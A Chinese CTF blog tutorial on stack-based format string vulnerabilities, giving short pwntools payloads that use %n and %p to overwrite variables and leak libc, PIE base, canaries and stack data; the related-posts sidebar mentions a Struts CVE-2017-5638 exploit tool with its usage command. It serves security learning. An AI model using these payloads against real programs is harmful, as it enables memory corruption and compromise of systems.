栈上的格式化字符串漏洞【超详细,七种利用】(pwn入门)

已于 2024-06-06 15:51:06 修改
阅读量1k 收藏 14
点赞数 44
分类专栏: pwn 文章标签: 安全 网络安全
于 2024-05-24 21:48:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_83422357/article/details/139180404
版权

写在前面:

格式化字符串漏洞由于目前编译器的默认禁止敏感格式控制符,而且容易通过代码审计中发现,所以此类漏洞现在已经极少出现了。

所以格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。

格式化字符串漏洞最早被Tymm Twillman在1999年发现,当时并未引起重视。在tf8的一份针对wu-ftpd格式化字符串漏洞实现任意代码执行的漏洞的报告之后(详情可参阅 《黑客攻防技术宝典-系统实战篇》),才让人们意识到它的危害,至此而发现了大量的相关漏洞。

格式化字符串漏洞的产生根源主要源于对用 户输入未进行过滤,这些输入数据都作为数据传递给某些执行格式化操作的函数,如printf,sprintf,vprintf,vprintf。恶意用户 可以使用"%s","%x",“%p”来得到堆栈的数据,甚至可以通过"%n"来对任意地址进行读写,导致任意代码读写。

一般掌握好“%n”和“%p”的利用就差不多了

作用一:

可以改写一个变量的值的大小,比如改写变量x的大小为任意你想要的值

小范围修改:

这里正常来说条件是不可能成立的,因为程序自己已经设定好了x的值为3,但是我们可以通过格式化字符串的漏洞改写变量x的值为5,使这个If条件成立,跳转到welcome这个漏洞函数里面去

依旧是以32位程序为例子

payload = p32(0x804C030) + b'%1c' + b'%4$n'

通过这个payload就可以改写x的值为5,从而使这个If条件成立,跳转到welcome这个漏洞函数里面去

大范围修改:

这个就需要自己去调试和真正理解这个格式化字符串的原理了,这里给出payload

payload = "%{}c".format(str(value)).encode() + b"%n$n"

payload=(b'%'+str(one_gadget>>padding&0xffff).encode()+b'c%n$hn').ljust(padding,b'\x00')

记得加上地址。

其实啊,这个也可以一键修改好你想要的值

就是pwntools小工具里面有这个写好的函数原型可以直接用,填入偏移,数据和地址就可以直接修改好,不过刚开始还是自己理解原理为最好,不要太依赖这个。

作用二:

泄露函数实际的地址

其实格式化字符串漏洞也可以泄露出来函数实际地址,然后根据固定公式,就可以计算出来Libc的基地址,这也是我最近才学习到的新方法,常规的泄露libc基地址的方法可以见我上一篇博客:ret2libc 泄露libc后构造system(‘/bin/sh‘)进行攻击(pwn入门)-CSDN博客

脚本如下:

payload =  '.%n$p'
p.sendline(payload)
p.recvuntil('.')
leak = int(p.recv(10),16) - padding

作用三:

泄露pie基地址从而绕过pie保护机制

脚本如下:

payload = '.%n$p'

p.recvuntil('.')
pie_base = int(p.recv(14),16) - padding - base

作用四:

泄露canary从而绕过canary保护机制

脚本如下:

payload = 'aaaa%n$p'

p.sendline(payload)

p.recvuntil('aaaa')

canary = int(p.recvuntil('00'),16)

log.success('canary:' + hex(canary))

作用五:

直接泄露出栈上的数据,如果一些重要的信息比如flag直接放在栈上,那可以直接利用下面payload泄露出来

payload = '%n$s'

作用六:

写地址进栈,来实现读任意地址内存

依旧是32位为例子

payload = <address>%<order>$s
这样就可以尝试读出,adress处对应的值,但是往往不会达到预期的目的,后来查了资料才知道

因为是%s,其遇到\x00就会直接断了,没有想要的输出。更常有的情况就是,会输出一大堆,然后我们想要的地址掺杂在里面,所以可以改进一下,可以加一组标记,然后再去取出来想要,这样也可以来检测是否被\x00截断了。
改进:

payload = <address>@@%<order>$s@@
在使用的时候记得除去 < >

64位的话就是地址放在后面

作用七(刚开始觉得这个不算Pwn入门所以没说):劫持fini_array|劫持got表

可以去看下我朋友写的博客,蛮详细的我就不多说了

【PWN · 格式化字符串|劫持fini_array|劫持got表】[CISCN 2019西南]PWN1-CSDN博客

写在最后:

这些就是很基础很基础的入门的运用了,其实真正的比赛往往考察的都是非栈上的格式化字符串漏洞,变量在.bss段或者别的地方,就得利用"四马分肥"和"诸葛连弩"这种精细的攻击手法,一点一点的去修改,还在学习ing......

小汪lt
关注
  • 44
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
《CTF特训营》——PWN:二进制安全基础
PICACHU+++的博客
08-13 2661
即DEP,是进制程序在非可执行的内存区中执行指令。在80x86体系中,操作系统的内存管理是通过页面表存储方式来实现,其最后一位就是NX位,0表示允许执行,1表示禁止执行。NX一般是防止直接在堆和栈上运行shellcode代码,gcc默认开启不可执行栈功能,添加编译选项z -exestack可开启栈可执行功能。...
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 3197
PWN 二进制漏洞审计
PWN-栈溢出漏洞
qq_42526420的博客
02-27 291
PWN-栈溢出漏洞 ret2text 信息搜集阶段 checksec re2text弄清楚保护机制 checksec的使用 file ret2text 静态分析 Q:IDA作为静态分析工具怎么可以计算出get_shell的虚拟地址? ​ 大概是因为这个文件没有开启ALSR技术,因此仅仅凭ELF文件本身信息尽可以推断出加载到内存的情况! vullnerable函数中的局部变量buf数组在IDA中给出了其在栈帧中的位置[ebp-10h],这个建议 有时准有时不准,保险起见这里要经过动态
pwn-格式化字符串漏洞
苗_的博客
09-07 887
一直想写一篇关于这个漏洞的博客,刚好借着今天刷到buu的【第五空间决赛2019】PWN5这道题来系统讲一下格式化字符串漏洞: (这里这道题还是蛮简单的,主要是去理解这个漏洞的原理,关于该漏洞的难度稍大的题会零开博客讲解) 看一下几个经常用来测试格式化字符串的格式控制符%d 用于读取10进制数值 %x 用于读取16进制数值 (这两个都可以起到泄露信息的作用)%s 用于读取字符串值  即泄露任意地址信息 (%d,%x只能泄露原有栈的内容,结合%s就可以泄露任意地址的内容) (%s不直接打印栈中内容,而是通过.
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5780
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串利用的时候主要分为三个部分。 格式化字符串
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞
pwn 格式化字符串漏洞及例题
limenzzz的博客
10-21 1814
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其中常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
Pwn(整数溢出漏洞)
神隐哥的博客
03-02 2010
漏洞介绍 整数就是没有小数的数字 在计算机中。有符号数用二进制表示。表示负数的时候。将二进制最高为来表示数字的符号,最高为是1就是负数。最高位是0就表是正数 当然。还有无符号数。也就是没有负数。 当我们尝试将一个数字范围为0-255的数字。 输入256时。就会溢出。返回0 输入257时。返回1 当有符号数溢出时。会从最小的值开始,-xxxxx然后依次+1 以下是各类符号范围大小漏洞危害 1: 数据截断 当发生溢出时。数据会被截断。 a\b\r为3个8位无符号整数。范围大小为0-255 a=11111111
pwn漏洞挖掘技术之栈溢出
Sakura给爷pwn全场
05-17 523
说点题外话,推荐一本二进制漏洞挖掘奇书:《0day安全:软件漏洞分析技术》,这本书从技术到进阶讲了与漏洞挖掘有关的知识。如果要在ctf的pwn方向或者是在网络安全方向的二进制漏洞挖掘中有所提升,这本书一定要看。下面回归正题。 栈在内存中是以什么形式存在的?首先要对内存有一定的了解。内存按功能大致可划分为代码区、数据区、堆区、栈区。其中栈区是内存中功能执行的一部分。通常来说,栈的操作有两种,压栈(PUSH)和弹栈(POP),遵循后进先出的原则(Last In First Out,简称LIFO)。要挖掘栈溢出漏
pwn(无system函数下的栈溢出漏洞利用 | 【puts函数】
weixin_43742794的博客
08-09 3263
pwn100及exp 首先用checksec看一下权限的情况 扔进ida64发现是一个栈溢出漏洞,但是并没有system函数和/bin/sh可以使用 这里需要用到一个DynELF类 具体细节可以参见这篇文章 https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 核心思路是通过DynELF泄...
某道Pwn格式化字符串漏洞
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
pwn -----gets 漏洞利用
qq_41071646的博客
12-29 2073
其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题  这个题 还是很简单的    先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag   在 调试下 发现了   然后...
Ubuntu 16.04 for pwn
大风C9的专栏
08-15 6263
我的ubuntu 16.04配置,主要用于pwn
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 780
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
pwn格式化字符串漏洞小结
PLpa的博客
11-30 2401
格式化字符串漏洞 0x00.前言 在pwn中,格式化字符串漏洞是一个非常基础的漏洞,他通常穿插在各种漏洞之中。比如,当程序开了PIE保护时,在栈溢出之前,我们先可以运用格式化字符串漏洞获取栈中的信息;通过格式化字符串漏洞的任意地址写,我们可以把栈帧劫持到堆地址上;我们甚至可以直接通过任意地址写,劫持got表,实现getshell…… 总而言之,格式化字符串漏洞虽然在目前市面上的软件中比较难以看到,...
pwn格式化字符串漏洞
最新发布
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用漏洞执行任意代码或者获取敏感信息格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细信息,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值